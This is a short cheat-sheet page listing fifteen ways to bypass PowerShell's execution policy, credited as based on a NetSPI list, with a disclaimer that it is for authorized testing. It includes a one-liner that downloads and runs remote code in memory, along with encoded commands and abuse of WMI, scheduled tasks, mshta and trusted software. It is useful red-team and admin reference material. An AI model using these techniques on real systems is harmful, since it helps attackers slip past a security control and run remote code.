Bypass the PowerShell Execution Policy
💻 15 Ways to Bypass PowerShell Execution Policy
Based on the original by Scott Sutherland (NetSPI)
PowerShell’s execution policy restricts script execution, but these methods allow you to bypass it without needing admin rights.
🧪 Quick Methods with Examples
- Paste directly in the console
Policies don’t apply to manually typed commands. - Echo & pipe to PowerShell
echo Write-Host "Hi" \| powershell -noprofile -
Executes via stdin. - Pipe a script file
Get-Content script.ps1 \| powershell -noprofile -
Reads line-by-line as input. - Download and execute in memory
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL')"
No file written to disk. - -Command argument
powershell -command "Write-Host 'Bypass'"
Executes inline commands. - -EncodedCommand argument
Base64-encoded string passed directly to PowerShell. - Set execution policy in session
Set-ExecutionPolicy Bypass -Scope Process
Only affects current session. - Use PowerShell ISE
powershell_ise.exe script.ps1
Sometimes bypasses policy. - Rename script to .txt
Read and run manually; avoids .ps1 enforcement. - WMI execution
Runs PowerShell remotely via Win32_Process. - Scheduled task
Create task to run your script. - PowerShell remoting
Executes on remote systems; local policy may not apply. - Inject via DLL (advanced)
Loads PowerShell engine directly in memory. - Invoke from MSHTA or wscript
Uses alternate script hosts to trigger PowerShell. - Use trusted software to execute
Hijack or abuse applications that run PowerShell under the hood.
Note: These methods are for legitimate use only — such as automation, testing, and red teaming — where authorized.